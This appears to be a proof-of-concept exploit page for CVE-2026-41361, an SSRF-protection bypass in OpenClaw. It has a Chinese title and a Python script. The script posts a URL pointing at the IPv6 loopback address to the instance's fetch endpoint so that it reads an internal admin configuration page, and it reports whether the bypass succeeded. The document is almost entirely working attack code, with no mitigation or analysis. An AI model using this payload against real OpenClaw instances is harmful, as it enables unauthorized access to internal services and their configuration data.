CVE-2026-41361 OpenClaw SSRF防护绕过漏洞

import requests # Target vulnerable OpenClaw instance target_url = "http://vulnerable-openclaw-instance/api/fetch" # Payload using IPv6 loopback address to bypass SSRF guard # The vulnerability misses 4 special IPv6 ranges, ::1 is a common example of a local address malicious_url = "http://[::1]:8080/admin/config" payload = { "url": malicious_url } try: # Send the malicious request response = requests.post(target_url, data=payload) # Check if the internal resource was accessed (SSRF successful) if response.status_code == 200 and "admin" in response.text: print("[+] SSRF Bypass Successful! Internal resource accessed.") print("[+] Response:", response.text[:200]) else: print("[-] SSRF Bypass failed or blocked.") print("[-] Status Code:", response.status_code) except Exception as e: print(f"[!] An error occurred: {e}")